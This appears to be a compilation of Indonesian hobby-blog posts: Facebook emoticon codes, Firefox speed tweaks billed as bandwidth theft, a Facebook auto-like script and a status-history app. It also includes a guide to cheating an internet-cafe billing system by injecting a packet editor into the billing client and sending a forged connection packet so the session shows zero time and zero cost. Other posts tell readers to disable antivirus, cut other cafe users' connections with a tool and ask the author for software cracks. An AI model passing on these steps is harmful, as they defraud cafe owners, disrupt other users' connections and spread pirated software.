[[306019522772134]] [[267712979948966]] [[301751889864065]] [[213122875437139]] [[164020277032670]] [[158735217564918]] [[261124587284685]]
[[114261558693806]] [[113889888730617]] [[316407155046042]] [[316473595041291]] [[346326392049037]] [[284570571589911]] [[298670736837009]]
[[219939044752270]] [[336155773063546]] [[131032267012645]] [[155856061183812]] [[208532722565686]] [[268249169896142]] [[204863289602546]]

megusta

[[10150425979186326]] [[10150425979236326]] [[10150425979391326]] [[10150425979441326]] [[10150425979466326]] [[10150425979526326]]
[[10150425979626326]] [[10150425979671326]] [[10150425979186326]] [[10150425979186326]] [[10150425979186326]] [[10150425979986326]] [[10150425980006326]]
[[10150425980066326]] [[10150425980101326]] [[10150425980231326]] [[10150425980436326]] [[10150425980451326]] [[10150425980506326]] [[10150425980561326]]
[[10150425980646326]] [[10150425980686326]] [[10150425980756326]] [[10150425980831326]] [[10150425980896326]] [[10150425981096326]] [[10150425981191326]]
[[10150425981251326]] [[10150425981306326]] [[10150425981366326]] [[10150425981406326]] [[10150425981466326]] [[10150425981516326]] [[10150425981591326]]
[[10150425981651326]] [[10150425981796326]] [[10150425981816326]] [[10150425981876326]] [[10150425981906326]] [[10150425981966326]] [[10150425982006326]]
[[10150425982066326]] [[10150425982101326]] [[10150425982131326]] [[10150425982196326]] [[10150425982261326]]


Complet list ....YANG LAIN JANGAN CUMA LIHAT AJA COMMENTNYA MANA DONK :p

BROWSER ANDA LEMOT? MAU CEPAT? BACA INI


Halow sobat sobat mania... Kali ini saya akan memberikan cara gimana mencuri bandwith.. Ya maklumlah ya bro, kali ini sering sekali kalau kita hotspotan dan banyak tetangga yang menggunakan server kita. jadi lambat deh koneksi kita.
terlebih lagi bagi penguna Broadband / VSAT.....
tapi langkah itu mungkin tidak ada lagi... inilah cara jitu mencuri bandwith orang lain.. walaupun bikin orang lain jadi jengkel lah...
Oke Bro this is the trick :
Membuka browser Mozilla firefox kamu terserah itu yang modelnya kayak apa tapi diusahakan yang versi terbaru..
Pada addres bar ketikkan about:config Lalu akan muncil gambar seperti di bawah ini > Klik I’ll be careful, I promise


Cari string di bawah ini ( pastikan semua string di set ke ”true”) contoh penggantiannyaNetwork.http.pipelining false > klik kanan dan pilih “toggle” .


Network.http.pipelining true
Network.http.pipelining.maxreguests 64
Network.http.proxy.pipelining true
Network.proxy.share_proxy_setting false ( yang ini biarkan tetap false )
Lalu buat string baru, caranya klik kiri satu kali di mana saja,
klik kanan>new>integer.
Ketikkan nglayout.initialpaint.delay dan beri nilai 0
Kemudian refresh ato tekan F5
Pada addres bar ketikkan about:blank
NEW UPDATE FAST FIREFOX
Ganti kode:
browser.tabs.showSingleWindowModePrefs = true
network.http.max-connections = 64
network.http.max-connections-per-server = 20
network.http.max-persistent-connections-per-proxy = 10
network.http.max-persistent-connections-per-server = 4
network.http.pipelining = true
network.http.pipelining.maxrequests = 100
network.http.proxy.pipelining = true
network.http.request.max-start-delay = 0
network.http.request.timeout = 300
nglayout.initialpaint.delay = 0
network.dns.disableIPv6 = true
Restart mozilla.

Sekarang bisa kalian bedakan speednya kan hehe Sebagai catatan ada beberapa settingan tambahan lagi yang dapat diubah tapi tidak begitu penting cuma bersifat optional atau pilihan saja
Untuk Cable DSL
Ganti kode:
network.http.pipelining = true
network.http.proxy.pipelining = true
network.http.pipelining.maxrequests = 30
nglayout.initialpaint.delay = 0″

Untuk ADSL Cable
Ganti kode:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true
nglayout.initialpaint.delay = 0

Untuk Dial IP (Dial Up)
Ganti kode:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true
signed.applets.codebase_principal_support : true

Oya ada catatan kecil ni,,.
Kemudian klik menu :
Untuk OS windows XP : tools > options.
Untuk OS linux (vector) : edit > preference.
Untuk Setting yang berbeda di
beberapa OS edit > advanced
.

Pada options allow web sites to install software beri tanda centang untuk mengaktifkan ato masuk ke
tab ADVANCE lalu pilih sub tab UPDATE kemudian centangi installed add-ons lalu oke
Kemudian tekan refresh atau juga dapat tekan F5
Langkah selanjutnya adalah download program:.
Switchproxytool v 1.3.4
Here is the link
<Via IDWS> atau
disini
<via addons Mozila> ==>untuk Mozilla Ver 3.4 Ke bawah.
Fasterfox (Gogling aja) ==>untuk Mozilla ver 3.5 Ke atas.
Next
1. Extrack file yang telah anda download tadi.
2. Kemudian install file tersebut dengan cara klik kanan filenya > open > pilih select the program from a list > untuk membuka file tersebut pilih browse > cari folder Mozilla firefox di program file > lalu pili firefox.exe > lalu OKE > lalu pilih install now > untuk mengaktifkan program tersebut pilih restart firefox..
3. Dan Open lagi Mozilla anda tadi.
Oke. thats is the trick.
And the last, Semoga beruntung dan Biasanya kalau mau MENYEDOT bandwith pakai aja DAP atau IDM. .. Kalau Perlu Yang Premium Sekalian biar tambah Cepeet…Oya ni trik aku pelajari dari temenku. N Pengalaman Pribadi juga hiiii :P Klo mau serial ato Crack DAP/IDM kirim ke emailq ajah di tab Info.
nb:*
—->>SwitchProxy yang anda gunakan tadi dapat Mengganti Proxy Secara Otomatis
Di Browser Mozilla FireFox.
—->>Langkah diatas Efektif dilakukan Di Warnet atau Hotspot Yang ramai untuk
Menyedot Bandwidth ke PC atau laptop Anda.

CARA RESET DURASI BILLING EXPLORER




aduuh udah lama sekali saya tidak muncul di dunia blogging, dan kali ini saya muncul karena saya punya beberapa trick asik dan seru, dalam dunia cyber,hacking,cracking bisa dibilang ini termasuk hal yang serupa, karena kita mencoba untuk menjebol system keamanan billing explorer, yaaah bisa dbilang cari celah dkit lah buat masuk, hehehe

oke kalo agan sudah siap , mari kita beraksiiiiiii... cyaaaaaaaaaaaaaaaaaaaaaaaa

1. agan maen di suatu warnet yang terlihat agak rame dkit, karena trick ini yang akan agan pelajari butuh kepekaan operator dalam melihat durasi di billing eplorer,

2. stlah agan sudah menemukan warnet tsbt, maen aja dulu spuasnya,,... X_X (mblenger dah tuh spuasnya) kalo ane seh paling 2jam 1jam, tapi seterah agan deh, eitts ambil nya kalo ane slalu personal gan... kalo paket salah code packet nya bisa kstop sndiri kalo disend packetnya ntar

3. download :  atau rpe  (disini) cari aja di google, bnyak kog. tar kalo ane sempet ane upload software nya.. ok ok ,... cium  dlu ah,,... mmmuaaach ..* ("kalo cewe")
eh jangan lupa disable dulu antivirus sebelum download

4. udah ddownload instal tuh. ato extrack, biasanya see kdetec antivirus gan... musti matiin dlu tuh biar aman jalannya...

5. kalo sudah di buka rpe nya dan bisa buka... lo slect new proccses deh di awal menu diatas. > bis itu open process > plih client.008 eitts jgn dinject dlu... di contang dlu (^^^ringgo) di bawah sblah kanan abis itu diinject deh

6. selepas kita sudah ter  inject sama clien .008 slanjutnya kita setting hotkey nya... pake f1 sma f2 aja gan gmpang . start f1 stop f2

7. buka client. biarin rpe kebuka.. trus tken f1 rpe merkam send messaage lewat client.008 , misal agan maen di pc 4, yaah send message nya ke pc4 juga, !!! kalo udah ksend message tken stop record ato f2.

8. muncul abal-abal di rpe. code packet, dan agan plihh yg Xj6****** (maaf lupa hehe) trus agan edit codenya kek gini (xj6conn$"nomerclient billing kamu"$"nama user client billing kamu"     udah trus send deh liat apa yg terjadi... tggu dlu, kalo agan pake username panjaaang bngt agan bisa tambahin digit packet nya di bawah tinggal dgeser aja dan contoh yg udah jadi kek gini (XJ6CONN$6$ATOX)   CRIIiiing 0.perak 0detik.. yeaaaaaaa agan berasilll





CREDIT BY ME http://funnycorp.blogspot.com

lihat status facebook sendiri yang sudah lama

Kalau diingat-ingat, sudah berapa lama kita memiliki akun FB?
dan selama itu sudah berapa ratus update status yg kita tulis?

tetu tak bisa diingat satu-persatu..

Kemarin saya menemukan aplikasi baru yang bisa menghimpun seluruh status kita dari yang pertama kita tulis sejak memeiliki akun fb baru hingga status terbaru di akun kita.

Tak hanya menjadi nostalgia saat kita bisa melihat seluruh status yg kita tulis, kita mungkin juga bisa tertawa, terharu karena kita kembali menelusuri moment2 beraneka ragam yang akhirnya melahirkan status2 di Fb kita.

ok untuk melihat seluruh status yg pernah kita tulis di FB silahkan masuk ke aplikasi di link di bawah ini:

cekidot di mari Gan: 

http://apps.facebook.com/mystatuses/

Setelah Anda masuk ke aplikasi tersebut ada 2 fasilitas yang kita miliki, yaitu melihat seluruh status dengan urutan terbaru ke terlama, atau dari terlama ke terbaru.

Silahkan bersenang2 dan masuki kenangan lama pada suasana saat itu dengan status2 yag pernah Anda tulis.

Semoga bermanfaat,

Salam 


atok creation

iseng-isneg diwarnet (JAIL)

hmmm sebel ngga? pas kita lagi maen di warnet ngame/download/nonton youtube ngeLAG?

pasti agan agan sebel banget..
liat-liat situasinya gan.. kalo emang diwarnet nya fasilitas nya ngga enakin bayar mahal buat koneksi seperti modem hp. agan bisa langsung praktekin tapi ane ngga tanggung jawab ya.. cuma kasih trick aja kog... ^_^ peace..





TO THE POINT

1.)  download software nya disini
2.)  instal aja tuh software nya
3.) truz masuk ke software > connection
4.) tinggal liat tuh bnyak amat yg ijo-ijo terserah agan yang mau di cut connection nya yang mana tinggal jadiin merah tar koneksi Otomatis terPUTUS.. ^_^ jadi agan-agan bisa download dgn kecepatan maksimal saya pernah nyampe 1mb/sec wow! diwarnet loH...  bukan di home.. :D (curhat.com)

selamat mencoba i HOpe u like it @_@

FACEBOOK AUTO LIKE AND COMMENT



to like status atau facebook auto like adalah cara otomatis like / suka terhadap status teman di facebook . Trik cara otomatis like / suka status facebook  teman anda  juga berlaku untuk otomatis  like / suka komentar facebook teman anda. Facebook auto like / suka status dan comment teman berkat bantuan addons mozilla firefox Greasemonkey. Add-ons Greasemonkey ini canggih juga banyak kegunaannya selain untuk facebook.
Memang caranya mudah otomatis like / suka status facebook teman anda tapi jangan usil nanti temanmu malah sebel karena banyaknya pemberitahuan di facebook mereka. Terus gimana sich caranya untuk menggunakkan facebook auto like status itu? Nah ini pasti yang kamu inginkan ya. Oke kita mulai langkah bagaimana cara otomatis like / suka status dan komentar facebook teman anda ini.
Perhatikan sebelum menggunakan auto like facebook :
  1. Jangan sering sering menggunakannya nanti anda kena roadblock
  2. Jangan asal menggunakanya nanti kamu di musuhi sama teman anda
  3. Aplikasi atau add-ons Greasemonkey hanya berlaku untuk browser mozilla firefox karena itu yang di ujicoba disini.
  4. Add-ons Greasemonkey hanya berlaku di komputer/pc  anda dan tidak berlaku pada PC atau laptop teman anda jika tidak menginstall Greasemonkey.
  5. Saya tidak menyediakan screenshot jadi praktekkanlah jika ingin melihatnya.
  6. Terakhir gunakanlah dengan bijak ya.
Sebelum memulai proses installasi auto like status facebook sebaiknya koneksikan PC atau laptop anda ke internet dan Siapkan kemampuan anda, kalo tidak bisa suruh teman anda untuk membantu.
Langkah langkah penggunaan facebook auto like status and comment :
  1. Install mozilla firefox jika belum terinstall  >>> download mozilla firefox
  2. Install add-ons Greasemonkey  >>> Install Greasemonkey
  3. Install facebook auto like >>> install auto like
jika proses diatas anda ikuti dengan benar maka anda sudah bisa melakukan otomatis like / suka pada status dan komentar teman anda di facebook. Selamat mencoba.

Kyanknya yang like komentar... g bisa..